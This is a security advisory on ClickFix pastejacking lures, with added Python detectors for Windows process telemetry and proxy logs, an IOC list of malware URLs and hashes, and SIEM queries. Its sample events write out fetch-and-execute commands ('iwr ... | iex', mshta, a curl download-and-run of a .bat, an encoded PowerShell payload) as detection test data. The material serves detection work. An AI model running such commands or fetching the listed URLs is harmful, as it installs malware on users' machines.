Recent Surge in ClickFix Activity

    Date: 12/09/2025

    Severity: Medium

    Summary

    ClickFix is a social-engineering technique that tricks users into pasting a malicious command into a terminal or a Run window (for example Win+R on Windows). The lure page usually writes the command to the clipboard itself (pastejacking) and then walks the victim through a "copy, paste, Enter" sequence framed as a fix or a verification step, so the user launches the malware by hand rather than through an exploit. Since September 2025, detections have surged to more than 200 compromised sites per day, driven by lures that mimic Google Chrome's "Aw, Snap!" error or fake browser update pages. These fraudulent pages ultimately deliver malware such as droppers, downloaders, and malicious browser extensions.
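    As an added illustration of how the behaviour described above shows up in endpoint telemetry (example code written for this page, not code from the advisory or from Unit 42), the following Python scores process-creation events for the ClickFix tell-tales: an interpreter or LOLBin spawned by explorer.exe (the parent of anything launched from the Win+R dialog or the File Explorer address bar), a command line that fetches and executes remote content or carries an encoded PowerShell payload, and a trailing "I am not a robot"-style comment that lures append so the Run box looks like a verification step. The event records, field names, hostnames and the encoded string are constructed for the example and are not indicators from this advisory.

```python
import re

# Constructed Sysmon-style process-creation records (parent image, image, command line).
# Sample data for this example only, not telemetry from the advisory.
SAMPLE_EVENTS = [
    # ClickFix-style launches: pasted into Win+R, so the parent is explorer.exe
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": 'powershell -w h -c "iwr http://lure.invalid/r9 | iex" # I am not a robot - reCAPTCHA Verification ID: 7811'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmd": "mshta https://lure.invalid/verify.hta"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmd": "cmd /c curl -s http://203.0.113.5/appp.bat -o %TEMP%\\a.bat && %TEMP%\\a.bat"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    # Benign baseline activity that must not alert
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmd": "notepad.exe"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell -c Get-Process"},
    {"parent": r"C:\Program Files\Git\cmd\git.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmd": "cmd /c git status"},
]

# Interpreters and download utilities that ClickFix lures are typed into or call
LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "curl.exe",
           "wscript.exe", "cscript.exe", "bitsadmin.exe", "certutil.exe"}

# A URL, or a cmdlet/tool that fetches remote content or runs it in memory
PAYLOAD_FETCH = re.compile(
    r"https?://|\b(?:iwr|irm|iex|invoke-webrequest|invoke-restmethod|invoke-expression|"
    r"downloadstring|curl|bitsadmin|certutil)\b", re.I)

# -e / -enc / -EncodedCommand followed by a base64 blob
ENCODED = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)

# Lures append a comment so the victim sees "I am not a robot" in the Run box
LURE_COMMENT = re.compile(r"(?:#|\brem\b)[^\n]*?\b(?:robot|captcha|verif\w*|human)\b", re.I)


def score_event(event):
    """Return the list of ClickFix indicators present in one process-creation event."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    parent = event["parent"].rsplit("\\", 1)[-1].lower()
    cmd = event["cmd"]
    reasons = []
    if parent == "explorer.exe" and image in LOLBINS:
        reasons.append("interpreter spawned by explorer.exe (Run dialog / Explorer address bar)")
    if PAYLOAD_FETCH.search(cmd):
        reasons.append("remote fetch or in-memory execution in command line")
    if ENCODED.search(cmd):
        reasons.append("encoded PowerShell command")
    if LURE_COMMENT.search(cmd):
        reasons.append("verification-style trailing comment (ClickFix lure)")
    return reasons


def detect_clickfix(events, min_indicators=2):
    """Alert on events that show at least min_indicators of the ClickFix pattern.

    A single indicator (e.g. PowerShell from explorer.exe) is too common to alert on
    by itself; two or more is rare outside ClickFix-style activity."""
    hits = []
    for event in events:
        reasons = score_event(event)
        if len(reasons) >= min_indicators:
            hits.append({"cmd": event["cmd"], "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in detect_clickfix(SAMPLE_EVENTS):
        print(hit["cmd"])
        for reason in hit["reasons"]:
            print("   -", reason)
```

    Four of the seven sample events alert; the benign PowerShell launched from explorer.exe scores only one indicator and is suppressed. On a real estate, feed this the parent/child/command-line fields from Sysmon Event ID 1 or Windows Security 4688 (with command-line auditing enabled) and tune the LOLBin set and threshold to the environment.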

    Indicators of Compromise (IOC) List

    URLs/Domains

    http://45.59.114.133/test.exe 

    http://52.14.189.234/424.php 

    http://77.0x6E.107.232/only/floid.gz 

    http://89.23.107.240:7777/confirmm2.com/Capcha 

    http://93.152.230.54/

    http://94.74.164.136/fifx.odd 

    http://194.87.55.59/rex.odd 

    https://ab7r3c.top/921tgE/ps1.php 

    http://acsolucionessa.com/1

    https://channelengine-market1.app/ 

    https://cutt.ly/keIDO0T5 

    https://elonpx.com/build.exe 

    https://files.catbox.moe/uaa9w6.txt 

    https://gvh.b-3-aconz.ru/  

    https://hafen.auricfluss.ru/9ctsqhi9 

    https://hafen.auricfluss.ru/teeyde9u 

    https://krone.frostweald.ru/g490ngrc 

    https://movarana.com/HuagW13_1.txt 

    https://softwaretech.pro/r9 

    https://update.coinmarketsap.com/ 

    http://updatesbrows.app/appp.bat 

    https://wald.rowanstead.ru/gu5ngeu0 

    Hashes (SHA-256)

    39eba783cb48bd00415b75f5b9d0678c4508d2ba0970c394913df3d38c652cf2

    4853a6eed666bd3ed28653de68576948d72e54df00adf3d49de63400bf728baa

    4574c18b6c8aad7d36939a7a19cc8103d2adb093a1f70f2ae54cd97c44b9b22c

    05bfa05140fffee6027d23a926c37d0e8cf88079bb51b01eb190f5aaaec9b946

    Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection

    Detection Query 1:

    sha256hash IN ("39eba783cb48bd00415b75f5b9d0678c4508d2ba0970c394913df3d38c652cf2","4853a6eed666bd3ed28653de68576948d72e54df00adf3d49de63400bf728baa","4574c18b6c8aad7d36939a7a19cc8103d2adb093a1f70f2ae54cd97c44b9b22c","05bfa05140fffee6027d23a926c37d0e8cf88079bb51b01eb190f5aaaec9b946")

    Detection Query 2:

    domainname like "http://194.87.55.59/rex.odd" or siteurl like "http://194.87.55.59/rex.odd" or url like "http://194.87.55.59/rex.odd" or domainname like "https://files.catbox.moe/uaa9w6.txt" or siteurl like "https://files.catbox.moe/uaa9w6.txt" or url like "https://files.catbox.moe/uaa9w6.txt" or domainname like "https://ab7r3c.top/921tgE/ps1.php" or siteurl like "https://ab7r3c.top/921tgE/ps1.php" or url like "https://ab7r3c.top/921tgE/ps1.php" or domainname like "http://45.59.114.133/test.exe" or siteurl like "http://45.59.114.133/test.exe" or url like "http://45.59.114.133/test.exe" or domainname like "https://krone.frostweald.ru/g490ngrc" or siteurl like "https://krone.frostweald.ru/g490ngrc" or url like "https://krone.frostweald.ru/g490ngrc" or domainname like "https://movarana.com/HuagW13_1.txt" or siteurl like "https://movarana.com/HuagW13_1.txt" or url like "https://movarana.com/HuagW13_1.txt" or domainname like "https://gvh.b-3-aconz.ru/" or siteurl like "https://gvh.b-3-aconz.ru/" or url like "https://gvh.b-3-aconz.ru/" or domainname like "https://cutt.ly/keIDO0T5" or siteurl like "https://cutt.ly/keIDO0T5" or url like "https://cutt.ly/keIDO0T5" or domainname like "https://update.coinmarketsap.com/" or siteurl like "https://update.coinmarketsap.com/" or url like "https://update.coinmarketsap.com/" or domainname like "http://52.14.189.234/424.php" or siteurl like "http://52.14.189.234/424.php" or url like "http://52.14.189.234/424.php" or domainname like "https://elonpx.com/build.exe" or siteurl like "https://elonpx.com/build.exe" or url like "https://elonpx.com/build.exe" or domainname like "https://softwaretech.pro/r9" or siteurl like "https://softwaretech.pro/r9" or url like "https://softwaretech.pro/r9" or domainname like "http://89.23.107.240:7777/confirmm2.com/Capcha" or siteurl like "http://89.23.107.240:7777/confirmm2.com/Capcha" or url like "http://89.23.107.240:7777/confirmm2.com/Capcha" or domainname like "https://wald.rowanstead.ru/gu5ngeu0" or siteurl like "https://wald.rowanstead.ru/gu5ngeu0" or url like "https://wald.rowanstead.ru/gu5ngeu0" or domainname like "http://94.74.164.136/fifx.odd" or siteurl like "http://94.74.164.136/fifx.odd" or url like "http://94.74.164.136/fifx.odd" or domainname like "http://acsolucionessa.com/1" or siteurl like "http://acsolucionessa.com/1" or url like "http://acsolucionessa.com/1" or domainname like "http://93.152.230.54/" or siteurl like "http://93.152.230.54/" or url like "http://93.152.230.54/" or domainname like "https://channelengine-market1.app/" or siteurl like "https://channelengine-market1.app/" or url like "https://channelengine-market1.app/" or domainname like "https://hafen.auricfluss.ru/9ctsqhi9" or siteurl like "https://hafen.auricfluss.ru/9ctsqhi9" or url like "https://hafen.auricfluss.ru/9ctsqhi9" or domainname like "https://hafen.auricfluss.ru/teeyde9u" or siteurl like "https://hafen.auricfluss.ru/teeyde9u" or url like "https://hafen.auricfluss.ru/teeyde9u" or domainname like "http://updatesbrows.app/appp.bat" or siteurl like "http://updatesbrows.app/appp.bat" or url like "http://updatesbrows.app/appp.bat" or domainname like "http://77.0x6E.107.232/only/floid.gz" or siteurl like "http://77.0x6E.107.232/only/floid.gz" or url like "http://77.0x6E.107.232/only/floid.gz"
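    Two things about the URL IOCs above are easy to get wrong when matching them against proxy or DNS telemetry, so here is an added Python example (written for this page; it is not Gurucul's query logic or Unit 42's code) that normalises both sides before comparing. First, the host 77.0x6E.107.232 uses a hex octet, which browsers and curl resolve as 77.110.107.232; a log that records the resolved form never string-matches the IOC as published, and the same applies to decimal "dword" hosts such as http://3260495675/. Second, several IOCs live on shared services (files.catbox.moe, cutt.ly), where only the full URL is malicious, so the example reports whether a hit was on the exact URL or only on the host. The proxy log lines are constructed sample data, and the assumption that the `domainname` field holds a bare hostname rather than a full URL is an assumption about the schema, not something the advisory states.

```python
import ipaddress
from urllib.parse import urlsplit

# A subset of the URL IOCs from the list above, including the hex-octet host as published.
IOC_URLS = [
    "http://194.87.55.59/rex.odd",
    "https://files.catbox.moe/uaa9w6.txt",
    "https://update.coinmarketsap.com/",
    "http://89.23.107.240:7777/confirmm2.com/Capcha",
    "http://77.0x6E.107.232/only/floid.gz",
]

# Constructed proxy log lines (timestamp client method url status); not real telemetry.
# 3260495675 is the decimal "dword" form of 194.87.55.59.
SAMPLE_PROXY_LOG = [
    "2025-12-09T10:01:02Z 10.0.0.21 GET http://77.110.107.232/only/floid.gz 200",
    "2025-12-09T10:01:05Z 10.0.0.21 GET https://UPDATE.coinmarketsap.com/ 200",
    "2025-12-09T10:02:11Z 10.0.0.33 GET http://3260495675/rex.odd 200",
    "2025-12-09T10:03:40Z 10.0.0.40 GET https://files.catbox.moe/other.txt 200",
    "2025-12-09T10:04:00Z 10.0.0.52 GET https://www.example.com/ 200",
]


def _octet(part):
    """Parse one IPv4 label the way URL parsers do: 0x.. is hex, a leading 0 is octal, else decimal."""
    if part.startswith("0x"):
        return int(part[2:], 16)
    if len(part) > 1 and part.startswith("0"):
        return int(part, 8)
    return int(part)


def normalize_host(host):
    """Lower-case a hostname and rewrite obfuscated IPv4 literals to dotted decimal."""
    host = host.lower().rstrip(".")
    try:
        if host.isdigit():                      # decimal dword form, e.g. http://3260495675/
            return str(ipaddress.IPv4Address(int(host)))
        parts = host.split(".")
        if len(parts) == 4:
            octets = [_octet(p) for p in parts]
            if all(0 <= o <= 255 for o in octets):
                return ".".join(str(o) for o in octets)
    except ValueError:
        pass                                    # a four-label DNS name, not an IP; keep it
    return host


def canonical_url(url):
    """scheme://host[:port]/path[?query] with the host normalised; no fragment, no userinfo."""
    s = urlsplit(url)
    host = normalize_host(s.hostname or "")
    port = f":{s.port}" if s.port else ""
    path = s.path or "/"
    query = f"?{s.query}" if s.query else ""
    return f"{s.scheme.lower()}://{host}{port}{path}{query}"


IOC_CANON_URLS = {canonical_url(u) for u in IOC_URLS}
IOC_HOSTS = {normalize_host(urlsplit(u).hostname) for u in IOC_URLS}


def match_proxy_log(lines, ioc_urls=IOC_CANON_URLS, ioc_hosts=IOC_HOSTS):
    """Return hits with kind "url" (exact IOC) or "host" (same host, different path)."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 5:
            continue
        canon = canonical_url(fields[3])
        host = urlsplit(canon).hostname
        if canon in ioc_urls:
            hits.append({"line": line, "kind": "url", "host": host})
        elif host in ioc_hosts:
            hits.append({"line": line, "kind": "host", "host": host})
    return hits


if __name__ == "__main__":
    for hit in match_proxy_log(SAMPLE_PROXY_LOG):
        print(f'{hit["kind"]:4} {hit["host"]:28} {hit["line"]}')
```

    The first three log lines hit on the exact URL even though none of them is byte-identical to the published indicator; the catbox.moe line is reported as a host-level hit only, which is the one to triage rather than block outright. When loading these IOCs into a platform, store the normalised form alongside the original and put full URLs only in the URL field; a full URL in a hostname field cannot match.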

    Reference:

    https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-12-03-recent-surge-in-ClickFix-activity.txt

    Tags

    Malware, ClickFix, Social Engineering
